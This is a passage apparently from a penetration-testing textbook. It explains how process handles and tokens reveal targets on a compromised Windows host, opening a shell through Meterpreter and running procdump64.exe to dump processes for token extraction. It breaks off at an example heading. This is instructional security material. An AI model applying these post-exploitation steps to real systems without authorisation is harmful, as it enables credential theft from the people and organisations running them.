are getting a list of all the process handles. A
handle
is a reference to an object. Pro‐
grams will create and open handles to have a way to get to another object. This may
include accessing external resources. You can see
the PID in the leftmost column, fol‐
lowed by the name of the executable that the process was created from. After this is
the handle and the object the handle references. These are all process handles, so
csrss.exe
, for example, has several references to other processes. This may mean that
csrss.exe
started up (spawned) those other processes
and is keeping references in
order to kill them later if necessary.
Although none are listed there, you can also see tokens listed in the handles. Keep in
mind that tokens can be used to gain access to resources such as authenticating
against applications that may hold data we want. This is another
reason to look at this
way of getting the PID, because in the process we’ll see processes we may want to
dump in order to extract tokens. For what we are doing here, we have what we need.
We have the PIDs.
To use
procdump64.exe
, we have to do one thing. It’s on
the remote system since we
uploaded it, but SysInternals tools require that we accept the end-user license agree‐
ment (EULA). We can do that by dropping to a shell on the remote system (just type
shell
in Meterpreter, and you will get a command prompt on the remote system).
Once we are on the remote system and in the directory the file was uploaded to,
which is where
we will be placed by default, we just run
procdump64.exe -accepteula
.
If we don’t do that, the program will print out the EULA and tell you that you need to
accept it.
Example 6-14
shows dumping a process.
Example 6-14. Using procdump64.exe
C: